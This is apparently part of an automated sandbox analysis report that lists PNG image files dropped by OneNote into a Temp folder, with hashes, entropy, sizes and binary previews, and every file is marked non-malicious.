SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Temp\{8457B773-2F6C-4B65-80DD-FF7E68053DA8}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Temp\{847CD394-9D2D-437A-B0DE-77AC71F734C2}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Temp\{85165EF1-14BB-4FB0-82DA-FF603FE9B40F}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Temp\{86E70C57-94FE-4C37-8D38-3DBE1DE6787D}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Temp\{87F81A21-2C50-4111-A2DB-4D3C01AAFE65}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13737
Entropy (8bit):	7.916899917415529
Encrypted:	false
SSDEEP:	384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
MD5:	830632032C7DDBCCDE126F4BAE935540
SHA1:	9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
SHA-256:	2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
SHA-512:	5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
Malicious:	false
Preview:	.PNG........IHDR.............w.pl....sRGB.........gAMA......a.....pHYs..........o.d..5>IDATx^....E...,"o.....&....AY$....AE..".l....+G.>AP@D..e..".".A.Y.@...K..IXB !..!..c1.On...===3=.3=.>9O..u....w.z..-].t9]B@...!.......Z...B@...^G`.Q.&S..u$d....B.Y..P.w5[]......B.m.D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@..L..B@..........D..! .D...! ..@...Ls.Q"....."S....B ..D.9.(.B@.....b@...!..."..@..! ....T1 ........i. J....B@d....B@...4..%B...! 2U...! .r@@d....!............9 2..D...B@......5jT.@.{..O.;k....>.._o.+......{V...&C..(?.m.....F....gd.....?.....3u..x^L.1n^...@../.....XE....L..!...t.....L..B.).=..sn..U........@.O..$..o..L.....g.(D...(....Lo8.....,....f;o..i.f.h.9........\./..[W.9.....+....,X..+.d.....Xc..7.p.m.Yg.u:YO.V..l.t.].Z.g.U...]...5.^..._.~.WL...o.3f..s.,Y.X.7.x5...K/-..._.......{........W.(Y....?...!....W;.....iwNMW.............@+Q.5.#.

C:\Users\user\AppData\Local\Temp\{8CA81E94-4D4B-4F01-BBB8-11686ADAC038}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	5386
Entropy (8bit):	7.943706538857394
Encrypted:	false
SSDEEP:	96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
MD5:	DB48555480A383CD1D4DD00E2BCFCF29
SHA1:	8060B6FE12175289F0A71F45B894030A0D9F1AB5
SHA-256:	807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
SHA-512:	2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
Malicious:	false
Preview:	.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++...pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.\|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k\|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

C:\Users\user\AppData\Local\Temp\{8EC83416-0E74-4814-8128-A7ABA7AE828A}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14553
Entropy (8bit):	7.951135681293377
Encrypted:	false
SSDEEP:	384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
MD5:	3E9F7D399DF9CAD3669B7A5445EF7074
SHA1:	2FBC965DC03EF9203581F595E0D7AB1734726ED7
SHA-256:	76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
SHA-512:	326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,\|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..\|.]....s.6[..H...N@.=M..\|`...3./...I.....'..\|..K...r\|...nX...'.. .G...ib\|...MY8\|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.\|....?.^..5^}..$.. .....S.@...<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...\|....W<{...g.&'Ca

C:\Users\user\AppData\Local\Temp\{9139A683-50FC-4F67-8293-F11549E1151E}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	19235
Entropy (8bit):	7.944867159042578
Encrypted:	false
SSDEEP:	384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
MD5:	AE32E846559D576FD263BD69FEDBEC28
SHA1:	D481DF71C858BAECFE33418002D368F2DCF68D4A
SHA-256:	6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
SHA-512:	9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=\|z7.Z.\|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.u.j..S.C=...\|.....2..(YF........\|....7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

C:\Users\user\AppData\Local\Temp\{93852227-1E6A-4BDA-BBE4-212246292B3B}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Temp\{94F17795-F64C-4682-9781-BC46856DE37A}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2210
Entropy (8bit):	7.86853667196985
Encrypted:	false
SSDEEP:	48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
MD5:	73E38124F94AD20A2F1571FBBE11AEEC
SHA1:	87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
SHA-256:	A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
SHA-512:	320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
Malicious:	false
Preview:	.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1\|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B\|CW......sO..\.=..&3...,.

C:\Users\user\AppData\Local\Temp\{9809EB93-64A1-43D4-BF76-58E384FD6A7A}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Temp\{982BE77D-4298-4C44-9678-C495ED15F1BE}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4181
Entropy (8bit):	7.950380155401321
Encrypted:	false
SSDEEP:	96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
MD5:	BC6C08F8C2C6D1EEE95ABFC40C3C3669
SHA1:	44DE7375375880ACC24938D7E92A837E85C35321
SHA-256:	6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Temp\{98F9A413-3408-43C9-A871-77FE90888FE3}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Temp\{99B375F5-E1C6-4032-AA36-01518DDBA8DA}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
